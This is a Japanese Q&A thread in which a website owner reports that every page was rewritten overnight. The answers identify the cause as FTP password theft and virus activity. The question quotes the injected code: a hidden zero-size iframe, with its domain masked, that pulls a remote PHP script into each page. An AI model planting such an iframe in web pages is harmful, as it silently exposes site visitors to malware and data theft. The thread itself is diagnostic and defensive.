全50ページほどのWEBサイトを運営しています。
サーバーはレンタルサーバーで、FTPソフトを使用してページをアップロードしています。
先日、トップページを開いたところレイアウトがぐちゃぐちゃになっていました。
(カラム落ちしたり、ヘッダーが表示されていなかったり。)
そして、index以下のページは全て真っ白、何も表示されていない状態に。
FTPソフトで見ると、サーバー側のファイルの更新時間が、朝の8:42~43に全ページ書き換えられていました。
もちろん何もさわっていません。
ローカルファイルを一括アップロードすると元通りに回復しました。
レンタルサーバー会社のお知らせに、
「メンテナンス時に不具合が生じたようで…」とのコメント。
サーバー側の不具合か?と思っていたのですが、
真っ白になったページのソースを見てみると<body>直下に
<!--1679091c5a880faf6fb5e6087eb1b2dc-->
<iframe src="www.○○.com/70cc.php?id=codeblockstat" width="0" height="0" style="display:none;" />
<!--/1679091c5a880faf6fb5e6087eb1b2dc-->
と入っていました。もちろんこんなタグは入れていません。
急いでアップロードし直したので全ページこれだったかは定かではありませんが
おそらく「style="display:none;"」は入っていたものと思われます。
「www.○○.com」にアクセスすると、わけのわからない真っ青な外国のページでした。
(ウイルスか何かだったらいけないと思い、URLは伏せました。)
サーバーの不具合でこんなソースが混入するものでしょうか?
サイトがサイトでしたので、何か意図的なソースの書き換えだったのではないかと考えています。
そういえば以前も、朝の9:13~15にかけてサーバー側のファイルが全ページ更新されていたことがあったのですが、その時は特に実害がなかった(ように思われた)ので、パスワードもそのままにしたと思います。
「ガンプラ―ウイルス」というものにも感染したことがあるので、心配です。
こういうのはどういう方がどういう目的で発信するんでしょうかねぇ…
何かご存知の方いらっしゃいましたら教えていただけませんでしょうか。
よろしくお願いいたします。
No.2ベストアンサー
- 回答日時:
> <iframe src="www.○○.com/70cc.php?id=codeblockstat" width="0" height="0" style="display:none;" />
こんな「絶対に画面上に表示させない」ことを狙ったiframeの挿入はウイルスか不正アクセス意外には考えにくいと思います。
仮に「サーバー側の不具合」だったとしても障害の類ではなく不正アクセスやウイルス感染の類だと思われます。
サーバー運営者側が現在はまだ調査中で障害の詳細を発表できていない、という可能性は考えられますが、詳細が出ていて内容があくまでメンテナンス関連のものであれば、今回の件との関連は薄いでしょう。
それよりも気になるのは、
> 「www.○○.com」にアクセスすると、わけのわからない真っ青な外国のページでした。
何故、そんな怪しげなサイトにアクセスしちゃいますか?
該当のコードはそのサイトにユーザーをアクセスさせることが目的のコードですので、そこにアクセスした時点で一巻の終わりである可能性が非常に高いです。
アクセスすることでウイルスに感染させるなどというレベルでなく、既にウイルス感染したPCをそこにアクセスさせることで個人情報を根こそぎ引っこ抜いている可能性も十分に考えられます。
状況から、あなたのPC内のデータは全部外部に流出してしまった可能性を考慮しておくべきでしょう。
また、
> 「ガンプラ―ウイルス」というものにも感染したことがある
という経緯がありながら
> その時は特に実害がなかった(ように思われた)ので、パスワードもそのままにしたと思います。
という辺りも非常にぬるすぎます。
ほとんどダダ漏れじゃないですか。
> こういうのはどういう方がどういう目的で発信するんでしょうかねぇ…
ネットショッピングなどで利用するクレジットカードの情報などを奪う、などが主な目的です。
軽度なイタズラレベルでは、写真などの画像を抽出して、プライベートな恥ずかしい画像などがあればそれを本名・住所付きでネット上にばらまいたりする人もいますね。
仮にあなたのPCにはそのような情報がなく特に実害が無かったとしても、今回のようにFTPのパスワードを奪いあなたのサイトの情報を書き換えることで、あなたのサイトを信用して閲覧しに来る全てのユーザーに同様のウイルスを感染させ、そちらで実被害を大量に出します。
つまり、あなたがそういうウイルス対策を放置して適当に済ますことは、あなたの友人・知人に対して個人情報漏洩を幇助していることになるのです。
ご回答ありがとうございます。
やはり、ウイルスの可能性大ですか…
考えが甘かったですね。ご指摘感謝いたします。
「www.○○.com」へは、興味本位と言いますか
ウイルスなどではないかもしれないという期待もあって
アクセスしてしまいました。
ということは?
サーバー運営会社の問題ではなく、当方のFTPソフトのセキュリティ対策が甘くパスワードを奪われてしまったために、今回の件が起きたというのが有力説でしょうかねぇ…
サーバー運営会社にも問い合わせしてみたいと思います。
こちらでもFTPソフトのパスワードをまめに変えるなどして対策をしていきます。
ありがとうございました。
お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!
関連するカテゴリからQ&Aを探す
おすすめ情報
- ・漫画をレンタルでお得に読める!
- ・人生のプチ美学を教えてください!!
- ・10秒目をつむったら…
- ・あなたの習慣について教えてください!!
- ・牛、豚、鶏、どれか一つ食べられなくなるとしたら?
- ・【大喜利】【投稿~9/18】 おとぎ話『桃太郎』の知られざるエピソード
- ・街中で見かけて「グッときた人」の思い出
- ・「一気に最後まで読んだ」本、教えて下さい!
- ・幼稚園時代「何組」でしたか?
- ・激凹みから立ち直る方法
- ・1つだけ過去を変えられるとしたら?
- ・【あるあるbot連動企画】あるあるbotに投稿したけど採用されなかったあるある募集
- ・【あるあるbot連動企画】フォロワー20万人のアカウントであなたのあるあるを披露してみませんか?
- ・映画のエンドロール観る派?観ない派?
- ・海外旅行から帰ってきたら、まず何を食べる?
- ・誕生日にもらった意外なもの
- ・天使と悪魔選手権
- ・ちょっと先の未来クイズ第2問
- ・【大喜利】【投稿~9/7】 ロボットの住む世界で流行ってる罰ゲームとは?
- ・推しミネラルウォーターはありますか?
- ・都道府県穴埋めゲーム
- ・この人頭いいなと思ったエピソード
- ・準・究極の選択
デイリーランキングこのカテゴリの人気デイリーQ&Aランキング
-
携帯がウイルスに感染して不便...
-
イヤホンからウイルス感染する...
-
ウイルス感染の外付けHDDからデ...
-
大学生です。授業でUSBメモリを...
-
洋アダルトサイトのウイルス
-
最近、こういうのがよく出てく...
-
コンピュータウイルス感染?
-
Twitter Video Toolsというサイ...
-
漫画喫茶等のモニターに自分の...
-
postmasterにやられました。
-
ぶっちゃけWindows10/11にセキ...
-
ホームページを勝手に削除された
-
見知らぬファイルが・・・
-
Windows 10を使用していますが...
-
ネットカフェにインストールさ...
-
プリンタ-のSDカードにウィルス...
-
ターボ分子ポンプに窒素パージ...
-
Xperia 1 IIってなぜAndroid13...
-
mozcの個人情報
-
スタバなどのオープンwifi(Wi2P...
マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング
-
携帯がウイルスに感染して不便...
-
コンピュータウイルス感染?
-
イヤホンからウイルス感染する...
-
大学生です。授業でUSBメモリを...
-
リターンメールが大量に届きます。
-
Appleからアダルトウイルスに感...
-
MS32DLL..dll.vbsについて
-
遠隔操作ウイルス等の関して
-
ウイルス感染の外付けHDDからデ...
-
未だにNORTON2003なのですが、...
-
iPhoneの個人データーはウイル...
-
初期化設定について…
-
ウイルスに感染した場合。
-
ウイルスに感染したPCでDVDを見...
-
ウィルス感染してしまいました。
-
危険性について質問です。
-
「Backdoor.HackDefender」が削...
-
これってウイルスに感染してる...
-
10年以上前にトロイの木馬が入...
-
Gen:Variant.Symmi.54852 これ...
おすすめ情報